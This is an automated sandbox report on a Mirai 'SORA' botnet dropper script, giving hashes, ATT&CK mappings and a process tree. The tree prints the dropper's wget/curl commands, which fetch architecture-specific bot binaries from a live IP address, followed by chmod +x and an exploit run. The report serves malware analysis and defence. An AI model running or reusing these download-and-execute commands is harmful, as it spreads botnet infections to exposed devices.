mirai | 51e04d56632e0465248dbfdd5145d27c3b9e66c4a38f787c52ddf3a193ec2c91

Analysis

max time kernel
5s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
03-11-2024 14:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

goahead.sh
Size

2KB
MD5

2f155262711b3b5d224e0c947ff75981
SHA1

27318f291143b656c7d945d6f41d90e23d114562
SHA256

51e04d56632e0465248dbfdd5145d27c3b9e66c4a38f787c52ddf3a193ec2c91
SHA512

92d179867cb380e4948d702d0d9c90d7c6c288e0bb8ac8e97b512f848108e5b97b10fc02c38b5c8b7a57b446d53c1b46710ddd68e0d9ae9854366efd0e8d9d44

Score

10^/10

mirai sora botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1543	chmod
1572	chmod
1520	chmod
1531	chmod
1537	chmod
1577	chmod
1508	chmod
1514	chmod
1566	chmod
1560	chmod
1583	chmod
1526	chmod
1548	chmod
1554	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/robben	1509	robben
/tmp/robben	1515	robben
/tmp/robben	1521	robben
/tmp/robben	1527	robben
/tmp/robben	1532	robben
/tmp/robben	1538	robben
/tmp/robben	1544	robben
/tmp/robben	1549	robben
/tmp/robben	1555	robben
/tmp/robben	1561	robben
/tmp/robben	1567	robben
/tmp/robben	1573	robben
/tmp/robben	1578	robben
/tmp/robben	1584	robben

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-4.dat	upx
behavioral1/files/fstream-5.dat	upx
behavioral1/files/fstream-7.dat	upx

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1511	wget
1512	curl
1513	cat

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/robben	goahead.sh
File opened for modification	/tmp/sora.x86_64	wget
File opened for modification	/tmp/sora.i468	curl
File opened for modification	/tmp/sora.i686	curl
File opened for modification	/tmp/sora.arm4	curl
File opened for modification	/tmp/sora.arm7	wget
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.m68k	wget
File opened for modification	/tmp/sora.x86	curl
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.mips	curl
File opened for modification	/tmp/sora.x86_64	curl
File opened for modification	/tmp/sora.i686	wget
File opened for modification	/tmp/sora.arm6	wget
File opened for modification	/tmp/sora.arm6	curl
File opened for modification	/tmp/sora.ppc	curl
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.arm7	curl
File opened for modification	/tmp/sora.sh4	wget
File opened for modification	/tmp/sora.sh4	curl
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.mpsl	curl
File opened for modification	/tmp/sora.arm5	curl
File opened for modification	/tmp/sora.ppc440fp	curl
File opened for modification	/tmp/sora.m68k	curl

/tmp/goahead.sh
/tmp/goahead.sh
1⤵
- Writes file to tmp directory
PID:1494
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1499
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1506
- /bin/cat
  cat sora.x86
  2⤵
  PID:1507
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.x86 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1509
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1511
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1512
- /bin/cat
  cat sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1513
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.mips sora.x86 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1515
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1517
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/cat
  cat sora.x86_64
  2⤵
  PID:1519
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.mips sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1521
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.i468
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.i468
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat sora.i468
  2⤵
  PID:1525
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.i468 sora.mips sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1527
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1528
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/cat
  cat sora.i686
  2⤵
  PID:1530
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1532
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1534
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:1536
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1538
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.arm4
  2⤵
  PID:1540
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.arm4
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/cat
  cat sora.arm4
  2⤵
  PID:1542
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1544
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1545
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/cat
  cat sora.arm5
  2⤵
  PID:1547
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1549
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1551
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/cat
  cat sora.arm6
  2⤵
  PID:1553
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1555
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/cat
  cat sora.arm7
  2⤵
  PID:1559
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1561
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/cat
  cat sora.ppc
  2⤵
  PID:1565
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1567
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.ppc440fp
  2⤵
  PID:1569
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.ppc440fp
  2⤵
  - Writes file to tmp directory
  PID:1570
- /bin/cat
  cat sora.ppc440fp
  2⤵
  PID:1571
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1573
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1574
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1575
- /bin/cat
  cat sora.m68k
  2⤵
  PID:1576
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1577
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1578
- /usr/bin/wget
  wget http://93.123.85.190/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1580
- /usr/bin/curl
  curl -O http://93.123.85.190/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1581
- /bin/cat
  cat sora.sh4
  2⤵
  PID:1582
- /bin/chmod
  chmod +x config-err-NIVA2k goahead.sh netplan_h936vsxy robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 ssh-jEtKMpnRQZXG systemd-private-0009f4766a404df183b15805d288ffae-bolt.service-OGg5Wt systemd-private-0009f4766a404df183b15805d288ffae-colord.service-sESEkz systemd-private-0009f4766a404df183b15805d288ffae-ModemManager.service-gNDRoV systemd-private-0009f4766a404df183b15805d288ffae-systemd-resolved.service-8fH5H9 systemd-private-0009f4766a404df183b15805d288ffae-systemd-timedated.service-GYsKN0
  2⤵
  - File and Directory Permissions Modification
  PID:1583
- /tmp/robben
  ./robben goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
28KB

MD5
fa5457b7546c1b7060c30bde3f8649ca

SHA1
7c75f6463c36eaebc4719f47d8047e5195a85057

SHA256
d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf

SHA512
f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21

Download Submit
/tmp/robben

Filesize
28KB

MD5
ec332610b0ca5b634c097ed14f42eedc

SHA1
abcbd111601f4165c400e9db36fbf20339e37170

SHA256
2bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a

SHA512
f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0

Download Submit
/tmp/robben

Filesize
212B

MD5
83ab6cd9a67528bbc6f4f360cb7f8d83

SHA1
07e8f17209e0569aab39f062568ff0090d9b20d4

SHA256
3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

SHA512
171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

Download Submit
/tmp/robben

Filesize
28KB

MD5
d356657b6ea7a715b60217a914eb6ca8

SHA1
b276b1a91895c3025e9f9d64227205dac79c8ef6

SHA256
b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22

SHA512
3b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262

Download Submit
/tmp/robben

Filesize
64KB

MD5
fb3d051f41bd7347aeff64980f2d100b

SHA1
5261ff91b8d99d6b8f5f647e33aad29b90cee973

SHA256
19f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1

SHA512
82dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd

Download Submit
/tmp/sora.x86

Filesize
27KB

MD5
00eff503439515d9b12b9c068367cb80

SHA1
82d68f2b1ffca8558458c1b858599542a67d8bbf

SHA256
2962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276

SHA512
3800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads